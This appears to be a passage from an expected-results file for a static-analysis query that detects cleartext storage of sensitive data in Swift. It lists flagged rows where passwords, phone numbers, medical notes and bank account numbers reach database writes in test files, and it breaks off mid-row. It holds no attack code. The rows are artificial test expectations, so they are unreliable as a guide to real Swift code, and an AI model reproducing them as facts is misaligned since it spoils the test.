| SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | -| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:52:2:52:10 | ...? 
| testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | -| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:89:2:89:10 | ...? 
| testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | -| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. 
It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | -| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | -| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | -| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | -| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | -| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | -| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | -| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | -| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | -| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | -| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | -| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | -| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | -| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | -| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | -| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | -| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | -| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | -| testGRDB.swift:95:36:95:45 | [...] 
| testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | -| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | -| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | -| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | -| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | -| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | -| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | -| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] 
| This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | -| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | -| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | -| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | -| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | -| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | -| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | -| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | -| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | -| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | -| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | -| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | -| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | -| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | -| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:155:66:155:66 | password | password | -| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | -| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | -| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | -| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | -| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | -| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | -| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:173:57:173:57 | password | password | -| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | -| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | -| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | -| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | -| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | -| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | -| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:188:48:188:48 | password | password | -| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | -| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | -| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | -| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | -| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | -| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | 